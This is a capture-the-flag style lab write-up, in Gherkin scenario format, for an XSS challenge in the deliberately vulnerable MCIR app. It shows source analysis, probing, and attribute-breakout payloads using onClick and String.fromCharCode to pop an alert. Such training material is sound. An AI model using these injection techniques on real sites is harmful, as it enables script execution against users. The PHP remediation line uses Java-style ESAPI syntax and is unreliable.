## Version 1.4.1
## language: en

Feature:
  TOE:
    MCIR
  Category:
    xss
  Location:
    http://MCIR/xssmh/challenges/challenge3.php - Field text
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    You must perform an XSS attack in an HTML attribute.
  Recommendation:
    Encode the data inserted by the user

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.1     |
    | Mozilla Firefox | 65.0.1-2    |
  TOE information:
    Given I am running owasp bwa in VM virtualBox
    And I access to the next url
    """
    http://MCIR/
    """
    And I can see all the vulnerabilities of the app


  Scenario: Normal use case
  Going to vulnerabilities xss
    Given The application has a section for vulnerabilities xss
    And I see the list of challenges
    """
    Challenge 0 - alert("Hello, world!");
    Challenge 1 - The Failure of Quote Filters
    Challenge 2 - Basic Persistent Threat
    Challenge 3 - AttriBeautiful
    Challenge 4 - Black Comedy
    Challenge 5 - Detour
    Challenge 6 - Up the Chain
    Challenge 7 - Crouching JS, Hidden Field
    """
    Then I go to the page of challenge 3
    """
    http://MCIR/xssmh/challenges/challenge3.php
    """
    And I see the text field and the following text
    """
     You must perform an XSS attack in an HTML attribute.
     Your objective is to cause an alert box to pop up on the resulting page.
    """

  Scenario: Static detection
  The aplication only sanitize quotes and angle brackets
    When I look at the code in the next url
    """
    https://github.com/SpiderLabs/MCIR/blob/master/xssmh/xss.php
    """
    Then I can see the following code
    """
    56 $output = str_replace('Foo!', $_REQUEST['inject_string'],
    $base_output);
    57 $display_output = str_replace('Foo!', 'UNDERLINEME'.$_REQUEST
    ['inject_string'].'UNDERLINEMEEND', $base_output);
    58 break;
    59 case 'attribute_single':
    60 $output = str_replace('"bar!"', '\''.$_REQUEST
    ['inject_string'].'\'', $base_output);
    61 $display_output = str_replace('"bar!"', '\''.
    'UNDERLINEME'.$_REQUEST['inject_string'].'UNDERLINEMEEND'
    .'\'', $base_output);
    """
    Then The quotes of the inject_string parameter are cleaned
    And I see the following code in the form
    """
    42 <input type="hidden" name="sanitization_params" value="<,>" />
    43 <input type="hidden" name="sanitization_type" value="keyword" />
    """
    Then The application sanitize angle brackets
    And I can conclude that doesn't sanitize correct the characters
    And I can insert javascript code

  Scenario: Dynamic detection
  The message is insert in the page
    Given The application send data from method GET
    And I can insert any character
    Then I send the following characters
    """
    <h1>hello</h1>
    """
    Then I get the following message
    """
    h1hello/h1
    """
    Then I can see that the application only sanitize the angle brackets
    Then I can conclude that the application can be vuln to xss

  Scenario: Exploitation
  Using the methods onClick and String.fromCharCode
    Given The application filter the quotes and  angle brackets
    When I insert the following code
    """
    <script>alert("")</script>
    """
    And I get the following output
    """
    scriptalert(
    """
    Then The injection doesn't work
    Then I see that the information is displayed in a text field
    And I use the method onClick from javascript to insert code
    """
    "onClick="alert()
    """
    Then I click in the text field
    And I get a window alert
    Then I codify the message in decimal characters
    """
    Hello, this is a test

    104, 101, 108, 108, 111, 44, 32, 116 ,104,
    105, 115, 32 ,105, 115,32, 97, 32, 116, 101, 115, 116
    """
    Then I use the method String.fromCharCode
    And I inject the javascript code in the text field
    """
    "onClick="alert(String.fromCharCode(104, 101, 108, 108,
    111, 44, 32, 116 ,104, 105, 115, 32 ,105, 115,32, 97,
    32, 116, 101, 115, 116 ));
    """
    Then I get the alert window with the message

  Scenario: Remediation
  Using the ESAPI library
    Given I am running MCIR in OWASP BWA
    And I noticed that the application doesn't encode the data in html format
    And OWASP provides a library to encode the data correctly
    Then I can encode the inject_string parameter data
    """
    60 $output = ESAPI.encoder().encodeForHTML($_REQUEST['inject_string']);
    """
    Then The application will encode the following characters
    """
    & < > " "''/
    """
    Then Can not inject javascript code in the application

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.8/10 (High) - AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.3/10 (High) - E:F/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.3/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2019-02-21
